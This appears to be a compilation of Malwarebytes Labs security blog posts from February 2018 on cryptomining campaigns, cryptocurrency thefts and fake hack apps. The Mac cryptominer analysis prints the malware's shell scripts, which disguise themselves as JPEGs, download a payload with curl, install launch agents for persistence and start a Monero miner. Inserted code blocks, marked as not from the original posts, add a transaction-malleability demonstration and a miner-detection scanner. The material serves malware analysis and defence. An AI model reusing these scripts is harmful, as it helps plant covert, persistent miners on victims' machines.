As of now, Google has removed the fake Swift Cleaner apps carrying this new malware from the Play Store. However, even if Google states that their protection is on a high level, there appears to be no fail-proof way to stop malware from entering the Play Store. By using a quality mobile anti-malware scanner as a second layer of protection, you can stay safe even when Google Play Protect fails. We (as always) recommend Malwarebytes for Android. Stay safe out there!


A week in security (February 5 – February 11)

Malwarebytes - Mon, 02/12/2018 - 17:00

Last week on Malwarebytes Labs, we featured a new Flash Player zero-day that has been found in recent targeted attacks. And we talked about a new trick to cripple browsers that came out of the hat of tech support scammers.

We also covered several methods of stealing cryptocurrencies, including one for the Mac that wasn’t as new as it seemed, one for Android that poses as hack apps, and yet another abusing the fact that Deepfakes content was banned from most major networks. We even threw in an overview of several major cryptocurrency related thefts.

For Safer Internet Day 2018, we provided you with some fast and free tools to make your Internet experience safer and more private using ad blockers and anti-trackers.

Other news
  • Security researcher Scott Helme reported that thousands of US and UK government sites were running a compromised Browsealoud plugin, making visitors mine for the Monero cryptocurrency. (Source: Sky News)
  • Lenovo warned customers about two critical Broadcom (Wifi) vulnerabilities that impact 25 models of its popular ThinkPad brand. (Source: ThreatPost)
  • Research shows that Litecoin will be the next dominating cryptocurrency on the Dark Web, and not Monero as expected. (Source: Recorded Future)
  • A free decryption tool was released for Cryakl ransomware by Belgian Federal Police together with Kaspersky Lab. (Source: Bleeping Computer)
  • The Russian Research Institute of Experimental Physics was found to be using their nuclear supercomputer for cryptomining. (Source: Naked Security)
  • Researchers have identified a new strain of point-of-sale (PoS) malware that impersonates a LogMeIn service pack to steal credit card data via a DNS server. (Source: Tripwire)
  • The US Justice Department announced charges on Wednesday against three dozen individuals thought to be key members of “Infraud,” a long-running cybercrime forum that federal prosecutors say cost consumers more than half a billion dollars. (Source: Krebs on Security)
  • Working with Fujitsu, Microsoft is further embracing biometric technology with the implementation of a palm-vein authentication system that will be supported by Windows 10 Pro. (Source: CBR online)
  • Key iPhone source code gets posted online that could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. (Source: Motherboard)
  • VMware has advised on how to mitigate the Meltdown and Spectre chip design flaws in several of its products. (Source: The Register)

Stay safe, everyone!


Drive-by cryptomining campaign targets millions of Android users

Malwarebytes - Mon, 02/12/2018 - 14:00

Malvertising and online fraud through forced redirects and Trojanized apps—to cite the two most common examples—are increasingly plaguing Android users. In many cases, this is made worse by the fact that people often don’t use web filtering or security applications on their mobile devices.

A particular group is seizing this opportunity to deliver one of the most lucrative payloads at the moment: drive-by cryptomining for the Monero (XMR) currency. In a campaign we first observed in late January, but which appears to have started at least around November 2017, millions of mobile users (we believe Android devices are targeted) have been redirected to a specifically designed page performing in-browser cryptomining.

In our previous research on drive-by mining, we defined this technique as automated, without user consent, and mostly silent (apart from the noise coming out of the victim’s computer fan when their CPU is clocked at 100 percent). Here, however, visitors are presented with a CAPTCHA to solve in order to prove that they aren’t bots, but rather real humans.

“Your device is showing suspicious surfing behaviour. Please prove that you are human by solving the captcha.”

Until the code (w3FaSO5R) is entered and you press the Continue button, your phone or tablet will be mining Monero at full speed, maxing out the device’s processor.

Redirection mechanism

The discovery came while we were investigating a separate malware campaign dubbed EITest in late January. We were testing various malvertising chains that often lead to tech support scams with an Internet Explorer or Chrome user-agent on Windows. However, when we switched to an Android user-agent, we were redirected via a series of hops to that cryptomining page.

It seems odd that a static code (which is also hardcoded in the page’s source) would efficiently validate traffic between human and bot. Similarly, upon clicking the Continue button, users are redirected to the Google home page, another odd choice for having proved you were not a robot.

While Android users may be redirected from regular browsing, we believe that infected apps containing ad modules are loading similar chains leading to this cryptomining page. This is unfortunately common in the Android ecosystem, especially with so-called “free” apps.

It’s possible that this particular campaign is going after low-quality traffic—but not necessarily bots—and rather than serving typical ads that might be wasted, they chose to make a profit using a browser-based Monero miner.

We identified several identical domains all using the same CAPTCHA code, and yet having different Coinhive site keys (see our indicators of compromise for the full details). The first one was registered in late November 2017, and new domains have been created since then, always with the same template.

Domain name, registration date

Traffic stats

We believe there are several more domains than just the few that we caught, but even this small subset is enough to give us an idea of the scope behind this campaign. We shared two of the most active sites with ad fraud researcher Dr. Augustine Fou, who ran some stats via the SimilarWeb web analytics service. This confirmed our suspicions that the majority of traffic came via mobile and spiked in January.

We estimate that the combined traffic from the five domains we identified so far equals about 800,000 visits per day, with an average time of four minutes spent on the mining page. To find out the number of hashes that would be produced, we could take a conservative hash rate of 10 h/s based on a benchmark of ARM processors.

It is difficult to determine how much Monero currency this operation is currently yielding without knowing how many other domains (and therefore total traffic) are out there. Because of the low hash rate and the limited time spent mining, we estimate this scheme is probably only netting a few thousand dollars each month. However, as cryptocurrencies continue to gain value, this amount could easily be multiplied a few times over.


The threat landscape has changed dramatically over the past few months, with many actors jumping on the cryptocurrency bandwagon. Malware-based miners, as well as their web-based counterparts, are booming and offering online criminals new revenue sources.

Forced cryptomining is now also affecting mobile phones and tablets en masse—not only via Trojanized apps, but also via redirects and pop-unders. While these platforms are less powerful than their desktop counterparts, there is also a greater number of them out there. Similar to what we see with IoT devices, it’s not always the individual specifications, but rather the power of the collective group altogether that matters.

We strongly advise users to run the same security tools they have on their PC on their mobile devices, because unwanted cryptomining is not only a nuisance but can also cause permanent damage.

Malwarebytes mobile users are protected against this threat.

Indicators of compromise


rcyclmnr[].com rcylpd[.]com recycloped[.]com rcyclmnrhgntry[.]com rcyclmnrepv[.]com

Referring websites (please note that they should not be necessarily considered malicious):


Coinhive site keys:



Bank robbers 2.0: digital thievery and stolen cryptocoins

Malwarebytes - Fri, 02/09/2018 - 19:57

Imagine running down the street (and away from law enforcement) with 2,000 pounds of gold bars. Or 1,450 pounds in $100 bills. With both of these physical currencies amounting to roughly US$64 million, you’d be making quite a steal…if you could get away with it.

That’s exactly what the next generation of thieves—bank robbers 2.0—did in December 2017, when they stole more than $60 million in Bitcoin* from the mining marketplace NiceHash. It turns out stealing Bitcoin is a lot less taxing on the body.

*Disclaimer: I used the value of Bitcoins as they were at the time of the robbery. Current values are volatile and change from minute to minute.

Crime these days has gotten a technical upgrade. By going digital, crooks are better able to pull off high-stakes sting operations, using the anonymity of the Internet as their weapon of choice. And their target? Cryptocurrency.

Old-school bank robbers

The amount of money stolen from NiceHash is comparable to arguably the biggest physical heist to date, the theft of nearly $70 million from a Brazilian bank in 2005. Noted in the Guinness Book of World Records, the robbers managed to get away with 7,716 pounds of 50 Brazilian real notes. There were 25 people involved—including experts in mathematics, engineering, and excavation—who fronted a landscaping company near the bank, dug a 78-meter (256-foot) tunnel underneath it, and broke through 1 meter (about 3.5 feet) of steel-reinforced concrete to enter the bank vault.

The largest bank robbery in the United States, meanwhile, was at the United California Bank in 1972. The details of this bank robbery were described by its mastermind, Amil Dinsio, in the book Inside the Vault. A gang of seven, including an alarm expert, explosives expert, and burglary tool designer, broke into the bank’s safe deposit vault and made off with cash and valuables with an estimated value of $30 million US dollars.

What these robberies have in common is that, in order to pull them off, there were large groups of criminals involved with various special skills. Most of the criminals of these robberies were either caught or betrayed—physical theft leaves physical traces behind. Today’s physical robbers run the risk of getting hurt or hurting others, or leaving behind prints or DNA. And they are often tasked with moving large amounts of money or merchandise without being seen.

Bank robbers 2.0

So here come the bank robbers 2.0. They don’t have to worry about transporting stolen goods, fleeing the crime scene, digging, or blowing things up. They are in no—immediate—physical danger. And if they’re smart enough, they work alone or remain anonymous, even to their accessories. Their digital thievery has been proven successful through several methods used to obfuscate their identity, location, and criminal master plan.

Social engineering

One of the most spectacular digital crimes targeted 100 banks and financial institutions in 30 nations with a months-long prolonged attack in 2013, reportedly netting the criminals involved over $300 million. The group responsible for this used social engineering to install malicious programs on bank employees’ systems.

The robbers were looking for employees responsible for bank transfers or ATM remote control. By doing so, they were able to mimic the actions required to transfer money to accounts they controlled without alerting the bank that anything unusual was going on. For example, they were able to show more money on a balance than was actually in the account. An account with $10,000 could be altered to show $100,000 so that hackers could transfer $90,000 to their own accounts without anyone noticing anything.

The alleged group behind this attack, the Carbanak Group, have not yet been apprehended, and variants of their malware are still active in the wild.

Ponzi schemes

Bitcoin Savings & Trust (BST), a large Bitcoin investment firm that was later proved to be a pyramid scheme, offered 7 percent interest per week to investors who parked their Bitcoins there. When the virtual hedge fund shut down in 2012, most of its investors were not refunded. At the time of its closing, BST was sitting on 500,000 BTC, worth an estimated $5.6 million. Its founder, an e-currency banker who went by the pseudonym pirateat40, only paid back a small sum to some beneficiaries before going into default. It was later learned that he misappropriated nearly $150,000 of his clients’ money on “rent, car-related expenses, utilities, retail purchases, casinos, and meals.”


Even though details are still unclear, the NiceHash hack was reported as a security breach related to the website of the popular mining marketplace. Roughly 4,732 coins were transferred away from internal NiceHash Bitcoin addresses to a single Bitcoin address controlled by an unknown party. The hackers appear to have entered the NiceHash system using the credentials of one of the company’s engineers. As it stands now, it is unknown how they acquired those, although it’s whispered to be an inside job.

Stolen wallet keys

In September 2011, the MtGox hot wallet private keys were stolen in a case of a simple copied wallet.dat file. This gave the hacker access to not only a sizable number of Bitcoins immediately, but also the ability to redirect the incoming trickle of Bitcoins deposited to any of the addresses contained in the file. This went on for a few years until the theft was discovered in 2014. The damages by then were estimated at $450 million. A suspect was arrested in 2017.

Transaction malleability

When a Bitcoin transaction is made, the account sending the money digitally signs the important information, including the amount of Bitcoin being sent, who it’s coming from, and where it’s going. A transaction ID, a unique name for that transaction, is then generated from that information. But some of the data used to generate the transaction ID comes from the unsigned, insecure part of the transaction. As a result, it’s possible to alter the transaction ID without needing the sender’s permission. This vulnerability in the Bitcoin protocol became known as “transaction malleability.”

Transaction malleability was a hot topic in 2014, as researchers saw how easily criminals could exploit it. For example, a thief could claim that his transactions didn’t show up under the expected ID (because he had edited it), and complain that the transaction had failed. The system would then automatically retry, initiating a second transaction and sending out more Bitcoins.

Silk Road 2.0 blamed this bug for the theft of $2.6 million in Bitcoins in 2014, but it was never proven to be true.
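The mechanism described above, as an added example (not code from the original post): a deliberately simplified transaction format in which, as in Bitcoin, the signature covers the spent outpoints and outputs while the transaction ID hashes the whole transaction, scriptSig included. Re-encoding a script push as OP_PUSHDATA1 is a real non-canonical-encoding vector; the JSON serialization, the placeholder signature bytes and the `reconcile` check are constructed for illustration and show why a service should match payments on what was signed rather than on the txid alone.

```python
"""Transaction malleability on a simplified transaction format (added example)."""
import copy
import hashlib
import json

OP_PUSHDATA1 = 0x4C


def sha256d(data: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def serialize(tx: dict) -> bytes:
    # Canonical JSON stands in for the binary wire format (simplification).
    return json.dumps(tx, sort_keys=True, separators=(",", ":")).encode()


def txid(tx: dict) -> str:
    # The ID hashes the whole transaction, scriptSig included.
    return sha256d(serialize(tx))[::-1].hex()


def signed_digest(tx: dict) -> str:
    # What the sender signs: which coins are spent and where they go.
    # The scriptSig holds the signature itself and so cannot be covered by it.
    core = {
        "version": tx["version"],
        "inputs": [{"prev_txid": i["prev_txid"], "prev_index": i["prev_index"]}
                   for i in tx["inputs"]],
        "outputs": tx["outputs"],
    }
    return sha256d(serialize(core)).hex()


def malleate_push(script_hex: str) -> str:
    """Re-encode a leading direct push (opcode 0x01..0x4b) as OP_PUSHDATA1 <len>.

    Both forms push the same bytes, so script evaluation and the signature
    check are unaffected, but the raw bytes, and therefore the txid, differ.
    """
    script = bytes.fromhex(script_hex)
    n = script[0]
    if not 1 <= n <= 0x4B:
        raise ValueError("script does not start with a direct push")
    return (bytes([OP_PUSHDATA1, n]) + script[1:]).hex()


def malleate_tx(tx: dict) -> dict:
    # A third party on the network rewrites the scriptSig encoding of each input;
    # no key is needed because nothing it changes is under the signature.
    out = copy.deepcopy(tx)
    for inp in out["inputs"]:
        inp["script_sig"] = malleate_push(inp["script_sig"])
    return out


def spent_outpoints(tx: dict) -> set:
    return {(i["prev_txid"], i["prev_index"]) for i in tx["inputs"]}


def reconcile(ledger: list, sent_tx: dict) -> dict:
    """Match a broadcast withdrawal against confirmed transactions two ways.

    Matching on txid alone misses the malleated copy, which is what drives the
    "transaction failed, retry and pay again" failure; matching on the spent
    outpoints plus the signed content finds it, since those cannot be changed.
    """
    wanted_id = txid(sent_tx)
    return {
        "seen_by_txid": any(txid(t) == wanted_id for t in ledger),
        "seen_by_outpoints": any(
            spent_outpoints(t) == spent_outpoints(sent_tx)
            and signed_digest(t) == signed_digest(sent_tx)
            for t in ledger
        ),
    }


# Constructed sample: a placeholder 71-byte "signature" (not real DER) pushed
# with a direct push opcode, spending a made-up previous output.
FAKE_SIG = bytes([0x30, 0x45] + [0x02] * 69)
SENT_TX = {
    "version": 1,
    "inputs": [{"prev_txid": "aa" * 32, "prev_index": 0,
                "script_sig": (bytes([len(FAKE_SIG)]) + FAKE_SIG).hex()}],
    "outputs": [{"value": 150_000_000, "address": "customer-address-placeholder"}],
}

if __name__ == "__main__":
    confirmed = malleate_tx(SENT_TX)  # the copy that actually got mined
    print("sent txid     :", txid(SENT_TX))
    print("confirmed txid:", txid(confirmed))
    print("same signed content:", signed_digest(SENT_TX) == signed_digest(confirmed))
    print(reconcile([confirmed], SENT_TX))
```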

Man-in-the-middle (by design)

In 2018, a Tor proxy was found stealing Bitcoin from both ransomware authors and victims alike. A Tor proxy service is a website that allows users to access .onion domains hosted on the Tor network without having to install the Tor browser. As Tor proxy servers have a man-in-the-middle (MitM) function by design, the thieves were able to replace the Bitcoin address that victims were paying ransom to and insert their own. This left the ransomware authors unpaid, which in turn left the victims without their decryption key.


Also known as drive-by mining, cryptojacking is a next-generation, stealthy robbing trick that covers all mining activities completed on third-party systems without the users’ consent. Stealing little amounts from many can amount to large sums. There are so many methods to achieve this that Malwarebytes’ own Jérôme Segura published a whitepaper about it.

Unlike drive-by downloads that push malware, drive-by mining focuses on utilizing the processing power of visitors’ computers to mine cryptocurrency, especially those that were designed to accommodate non-specialized processors. Miners of this kind come to us in advertisements, bundlers, browser extensions, and Trojans. The revenues are hard to guess, but given the number of blocks Malwarebytes records on Coinhive and similar sites daily, criminal profit margins could be potentially record-breaking.

Physical stealing of digital currency

This last one brings us full circle, as someone actually managed to steal Bitcoins the old-fashioned way. In January 2018, three armed men attempted to rob a Bitcoin exchange in Canada, but failed miserably as a hidden employee managed to call the police. However, others have had more success. The Manhattan District Attorney is looking for the accomplice of a man who robbed his friend of $1.8 million in Ether at gunpoint. Apparently this “friend” got hold of the physical wallet and forced the victim to surrender the key needed to transfer the cryptocurrency into his own account.


As we can conclude from the examples above, there are many ways for cybercriminals to get rich quick. With a lot less risk of physical harm and even less hard labor, they can score larger amounts for less risk than the old-fashioned bank robbers. The only pitfall to robbing digital currency is how to turn it into fiat money without raising a lot of suspicion or losing a big chunk to launderers.

While the diminished use of violence is reassuring, it’s still beneficial to think about how we can avoid becoming a victim. Much of it has to do with putting too much trust in the wrong people. We are dealing with a very young industry that doesn’t have a lot of established names. So how can you avoid getting hurt by these modern thieves? Here are a few tips:

  • Don’t put all your eggs in one basket.
  • Use common sense when deciding who to do business with. A little background check into the company and its execs never hurt anyone.
  • Don’t put more money into cryptocurrencies than you can spare.
Additional links


New Deepfakes forum goes mining with Coinhive

Malwarebytes - Thu, 02/08/2018 - 19:23

You may or may not be familiar with the furore over Deepfakes, a relatively new development in pornography involving a tool called FacesApp, which is capable of producing a real porn clip that replaces the original actors’ heads with those of celebrities—or indeed, anyone at all.

Online fakes have been around since the early 2000s or possibly even earlier; alongside those old photos, fakers would also make the odd terrible porno flick. Those movies would quite literally be a static cut out of a celebrity’s head stuck onto the body. Some 20 years later, the tech has caught up, and the web is suddenly dealing with the fallout.

FacesApp allows people to “train” an AI to create a realistic head so the scene is practically indistinguishable from reality. The AI is trained by feeding it images or footage of people; the more data it has to go off, the more realistic everything is.

After a media firestorm, the inevitable has happened. All of the Deepfake subreddits, where the majority of content was being created, have been taken offline after major players such as Twitter and PornHub had already effectively banned Deepfake content from their networks.

The Deepfake tech is available for pretty much anyone to make use of—the only real barrier to entry is having a powerful PC capable of withstanding the intensive training process, which can take hours or days to complete.

Now, if you were a crafty cybercriminal and knew that the main Deepfakes sources were taken offline, with a sizable community of content consumers and creators with heavy-duty PC rigs suddenly set adrift, what would you do?

The answer, of course, is to monetize potentially dubious fakes that you didn’t create yourself and hammer visitors’ PCs with mining scripts.

One of the most popular “lifeboat” sites we’ve seen for those unceremoniously dumped from the tender embrace of reddit was being promoted pretty heavily on surviving subreddits.

On the surface, it looks like a fairly typical forum, and it’s been getting a fair bit of activity so far. It all looks legit—or at least as legit as can be, given the controversial content on offer.

A quick check of the source code, while your CPU likely ramps up to 100 percent, tells a slightly different story. The page pulls in a large chunk of JavaScript:

Sure, you could try to make sense of it as is. Or, you could just unpack it instead and save yourself a headache because that is a large, confusing pile of code. What is it doing?

var Miner=function

…miner…function? Did this site place mining scripts in the background?

They sure did, and we block both the mining script and the website in question.

Coinhive is something we’ve been blocking since October. It lets a site owner place a cryptocurrency mining script on a webpage, similar to how regular adverts are placed, except that it tries to use as much of the visitor’s machine as possible to mine Monero for the site owner. We’ve seen sites push a PC to the limit this way, with the mining script gobbling up CPU in the background.
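The check described above (look through the page’s scripts for the Coinhive loader and the unpacked `var Miner=function` fragment) can be scripted so it runs over saved page source. The following is an added example, not code from the original post or from Malwarebytes: it pulls every external script URL and inline script body out of an HTML document with the standard library parser and matches them against a small indicator set. The indicator patterns are an assumption for illustration (the Coinhive loader file name and its `CoinHive.Anonymous`/`User`/`Token` constructors as publicly documented in 2018, the `var Miner=function` fragment quoted above, and the `eval(function(p,a,c,k,e,...` signature of the packer that the “unpack it” step refers to); the sample page is constructed.

```python
import re
from html.parser import HTMLParser

# Indicators of an in-browser miner. These patterns are an assumption for
# illustration: the Coinhive loader file name and its constructor names as
# publicly documented in 2018, the `var Miner=function` fragment quoted above,
# and the signature of the eval-based packer that has to be unpacked first.
MINER_INDICATORS = {
    "coinhive-loader": re.compile(r"coinhive(?:\.min)?\.js", re.I),
    "coinhive-api": re.compile(r"\bCoinHive\.(?:Anonymous|User|Token)\s*\("),
    "miner-constructor": re.compile(r"\bvar\s+Miner\s*=\s*function\b"),
    "packed-script": re.compile(r"eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,"),
}


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from an HTML page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf))


def scan_html(html):
    """Return a list of {"where", "indicator"} hits for every script on the page."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        for name, pattern in MINER_INDICATORS.items():
            if pattern.search(src):
                findings.append({"where": "script src=" + src, "indicator": name})
    for index, body in enumerate(collector.inline):
        for name, pattern in MINER_INDICATORS.items():
            if pattern.search(body):
                findings.append({"where": "inline script #%d" % index, "indicator": name})
    return findings


# Constructed sample page (not the forum's real source): an external Coinhive
# loader, an inline miner, a packed script, and one ordinary script.
SAMPLE_HTML = """<html><head><title>Lifeboat forum</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
</head><body>
<script>
var miner = new CoinHive.Anonymous('SITE-KEY-PLACEHOLDER', {throttle: 0.2});
miner.start();
</script>
<script>eval(function(p,a,c,k,e,d){return p}('var Miner=function(){};',0,0,[],0,{}))</script>
<script>console.log('ordinary page script');</script>
</body></html>"""

if __name__ == "__main__":
    for hit in scan_html(SAMPLE_HTML):
        print(hit["where"], "->", hit["indicator"])
```

An external `src` hit tells you where the miner is being loaded from, which is the thing to block; a packed-script hit without any miner hit means the script still needs unpacking before you can say what it does.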

In an age of people leaving dozens of tabs open and going for dinner, websites running scripts that ramp you up to 100 percent CPU usage and generate a fair bit of heat in the bargain just aren’t my thing. Now that we have DIY fake porn tech that demands high system specs, with people simultaneously making content and downloading it, its users are prime targets for a spot of surreptitious cryptomining behind the scenes.

We’ve seen a few mentions of other Deepfake aficionados complaining about dodgy sites, and we’ll be taking a closer look to see what’s out there. All in all, you’re probably better off steering clear of the whole mess and taking up a less stress-inducing hobby (for you and your computer).

Keep your security tools up to date, make informed decisions about what you want to block, and keep those CPU temperatures down to a minimum!

The post New Deepfakes forum goes mining with Coinhive appeared first on Malwarebytes Labs.


Bogus hack apps hack users back for cryptocash

Malwarebytes - Wed, 02/07/2018 - 19:30

Recently, we discovered a gold…er…APK mine of fake hacking apps. The “legitimate” versions of hack apps are intended to hack other apps in order to get something for free. Although it’s unclear what exactly these fake apps claim to hack, the real hack job is done to unsuspecting users.

Search and you will find

Disclaimer:  I, and Malwarebytes, do not recommend the process I’m about to outline below. Be that as it may, I’m also not naïve and know people do this all the time. In order to demonstrate the pitfalls of such an approach, I’ll lay it all out for you.

Say you want a hack for a particular app. Obviously, you aren’t going to find such a hack on Google Play. So you fire up your favorite search engine and type in something like <app name> hack apk. In this example, let’s use Lyft hack apk—Lyft being, of course, the popular on-demand transportation company. There, right at the top of the results, is the link to the hack app you desire. You decide to play it safe and navigate to the source domain rather than the direct link to the hack app. It’s a clean but simple-looking website called

Convinced that such a clean-looking site has to be legitimate, you proceed to the Lyft hack app.


Complete with app screenshots, description of the app (stolen from Google Play), a FAQ, and a How to Install section, it looks promising. There is even a long list of tags so it can be easily searched—which is how you navigated there in the first place. You roll the dice and click Download APK…

A bad roll of the dice

After install, you open the app and get a message that states you need to install one of three apps listed to unlock premium content.


At this point, I suspect that a seasoned user would conclude that the jig is up and rush to uninstall, but let’s just play this out anyway. The first link for Castle Clash redirects you to the legit Google Play version of the game—okay, easy enough.  The second link for Final Fantasy XV redirects to a broken link—fail. The third and final link for AppMatch Survey redirects to a dreaded, but harmless survey that ends in, once again, installing an app from Google Play.

Besides the failed link, all the redirects equal a small payout to the evildoers if an app is installed. Hence the “run it for 30 seconds” disclaimer pop-up.

After installing said app, and still no hack app and/or premium content, you should be ready to uninstall this bogus hack job. Good luck finding the app’s shortcut icon though, because it doesn’t exist. Luckily, it’s not too hard to find in your apps list.

In reality, I’m a little disappointed and confused that the malware developers didn’t hide their efforts more thoroughly. But hey, it’s good news if you did unsuspectingly install it. Hopefully, if you did install it, you go through the steps to uninstall it despite the missing shortcut. However, there is going to be a small percentage that don’t bother and forget about its existence—which is exactly what the bad actors are “banking” on. (Pun intended. Wait for it…)

Oh, mine!

So far, the attempts to dupe users seem bush league. Meanwhile, the true malicious intent has been running in the background all along. During the entire process of clicking through redirect links, the user may notice their mobile device being a tad slow. That’s because a cryptocurrency miner has been running the whole time. Under the Java class com.coinhiveminer.CoinHive is a Monero JavaScript miner. Thus, we classify this bogus hack app as Android/Trojan.CoinMiner.kki.

Just a dish of adware

As if things couldn’t get worse, this fake hack app also comes with adware. Not surprising, as we are seeing a trend of adware being added to various malware variants as a way to gain extra revenue. This particular adware serves ad pop-ups, as seen below.

Snake eyes

At the beginning of this blog post, I mentioned that I was not naïve to the fact that people willingly install hack apps. I ask you, dear readers, to not be naïve as well. Trying to find workarounds to get apps for free that are otherwise paid apps on Google Play is a gamble. The odds are against you by going to third-party app stores to install apps for free, or finding hack apps like the one described above.  This roll of the dice ends in snake eyes.

In the scenario above, I’m not sure how anything is being hacked by the aforementioned Lyft Hack app. As a matter of fact, this should be the first clue that something is fishy. As with anything in life, use your best judgment when installing apps onto your mobile device. Installing an app from a shady app store, even if it does look legit, could cost you. Stay safe out there!

The post Bogus hack apps hack users back for cryptocash appeared first on Malwarebytes Labs.


New Mac cryptominer has 23 older variants

Malwarebytes - Wed, 02/07/2018 - 18:35

On February 1, a new Mac cryptominer was discovered being distributed via a hack of the MacUpdate website. Since then, we’ve been doing some digging and found that this isolated incident was just the tip of the iceberg. The malware delivered by the MacUpdate hack appears to be the culmination of something that has been around since at least early October of last year.

As we usually do when looking into new malware, we did some searches through the website VirusTotal—a massive crowd-sourced malware repository —to see if we could find any other variants. These searches, called “retrohunts,” don’t always turn up much, but in this case we struck gold, finding no less than 23 older variants of this malware!

The oldest of these was a file named “” (nice name). Decompressing the file resulted in a folder with two files: an image file called “ass.jpg” and an apparently broken application named “temp.”

As indicated by the Finder, the “temp” application does not work at all, and on inspection, it didn’t even have the right internal structure to be a macOS app.

However, the contents are nonetheless intriguing. They are:

  • an “ass.jpg” image (which you’re really better off not seeing)
  • a file named “” which is a launch agent .plist file
  • an executable named “Dock” (the same name as the Apple process that manages the Dock)
  • a Frameworks folder containing some external framework code that must be needed by the Dock executable

Clearly, this isn’t an app, but some kind of naughtiness is planned.

What about the first ass.jpg file, located outside the bundle? In what I bet is not at all surprising to anyone, it turns out it’s not actually a JPEG file. Instead, it’s a shell script.

nohup mv ~/Downloads/niceass/ ~/Downloads/niceass/.tmp mv ~/Downloads/niceass/.tmp/Apple ~/Library &&
mkdir -p ~/Library/LaunchAgents &&
mv ~/Library/Apple/ ~/Library/LaunchAgents &&
launchctl load -w ~/Library/LaunchAgents/ &&
rm -rf ~/Downloads/niceass/.tmp &&
rm ~/Downloads/niceass/ass.jpg &&
mv ~/Library/Apple/ass.jpg ~/Downloads/niceass &&
open -a Preview ~/Downloads/niceass/ass.jpg &&
~/Library/Apple/Dock -user -xmr &
killall Terminal

As we can see, this script assumes it will be run from within the niceass folder, which in turn must be in the Downloads folder. If it’s anywhere else, or if you removed the broken, the malware will fail completely.

The first step is to rename to “.tmp”, which hides it from view thanks to the initial period in the name. (I’m not sure why it wasn’t distributed with this name in the first place, which would have been far less suspicious.) Next, it moves the various components out of the niceass folder and into the desired locations. The launch agent .plist file is installed and loaded.

Next, the script cleans up a bit and replaces the ass.jpg file with the ass.jpg file from inside the Apple folder. That file is then opened in Preview (ow, my eyes!) to cover up the fact that what was opened wasn’t just an image file.

Finally, the malicious Dock process is launched, passing in what appears to be an erroneous email address as the username to log in to Minergate. Dock will then suck up as much CPU time as it can to mine the Monero cryptocurrency. Hold on tight as your MacBook Pro’s fans attempt to propel it into flight!

The interesting thing is how the ass.jpg runs. We’ve covered a number of tricks used by malware in the past to make a shell script look like another type of file, such as a space at the end to prevent the extension from actually being treated as an extension or the use of special non-ASCII lookalike characters in the extension. In this case, though, that’s an honest-to-goodness .jpg extension.

There’s actually a simple way to override this extension. Using the Get Info window (File -> Get Info in the Finder), you can change the application used to open a particular file.

Doing so saves this setting in special metadata associated with the file. If the file is then compressed into a zip file using a Mac, that metadata will be preserved in some special files added to the zip file, and it will be reconstructed on another Mac when decompressed. This metadata can be viewed from the command line using the “xattr -l” command.

$ xattr -l /Users/thomas/Desktop/link-to-download.txt
00000000 62 70 6C 69 73 74 30 30 D3 01 02 03 04 05 06 57 |bplist00.......W|
00000010 76 65 72 73 69 6F 6E 54 70 61 74 68 5F 10 10 62 |versionTpath_..b|
00000020 75 6E 64 6C 65 69 64 65 6E 74 69 66 69 65 72 10 |undleidentifier.|
00000030 00 5F 10 24 2F 41 70 70 6C 69 63 61 74 69 6F 6E |._.$/Application|
00000040 73 2F 55 74 69 6C 69 74 69 65 73 2F 54 65 72 6D |s/Utilities/Term|
00000050 69 6E 61 6C 2E 61 70 70 5F 10 12 63 6F 6D 2E 61 |inal.app_..com.a|
00000060 70 70 6C 65 2E 54 65 72 6D 69 6E 61 6C 08 0F 17 |pple.Terminal...|
00000070 1C 2F 31 58 00 00 00 00 00 00 01 01 00 00 00 00 |./1X............|
00000080 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 6D |...m|

All in all, this is not a highly sophisticated piece of malware. There are many points of failure and things that will cause suspicion, and these could have all been avoided easily. But hey, this is just the earliest variant. We’ve still got 22 others to look at!

It turns out that none of the other niceass variants are any more sophisticated. Chronologically, the next variant is called “”, and it works similarly, except that the suspicious has been renamed, hiding it from the user’s view. It replaces the nasty photo with a text file containing a serial number of some kind. Otherwise, it is mostly identical, even down to the same damaged email address passed to the miner.

Next came a long string of files claiming to be JPEGs taken from WhatsApp, having names like “WhatsApp Image 2017-12-23 at 13.31.15.jpeg.” These didn’t rely on the, instead downloading the payload from as we saw with the MacUpdate variants, and grabbing a decoy image from

nohup rm -rf ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg &&
curl -o ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg &&
open -a Preview ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg &&
curl -o ~/Library/ &&
cd ~/Library &&
unzip ~/Library/ &&
rm -rf ~/Library/ &&
mkdir -p ~/Library/LaunchAgents &&
mv ~/Library/GoogleSoftwareUpdateAgent.plist ~/Library/LaunchAgents &&
launchctl load -w ~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist &
killall Terminal

This variant also employs the MacOSupdate.plist and MacOS.plist launch agents as seen with the MacUpdate variants of the malware. These WhatsApp variants are dated between December 23 and January 26 (judging by the file metadata, not the filename).

The final variant, dated December 26, was a single file named link-to-download.txt, which had similarities with both the WhatsApp and serial/niceass variants.

Interestingly, these files are all cryptographically signed using two different Apple developer certificates. These certificates were issued to people named (or claiming to be named) Ramos Jaxson and Tiago Mateus. (Mr. Jaxson was also responsible for the signatures on the more recent MacUpdate variants.)

In an interesting development, reported first by Arnaud Abbati of SentinelOne, the hidden .DS_Store metadata file inside the more recent MacUpdate variants revealed Mr. Mateus’ full name to be Tiago Brandao Mateus.

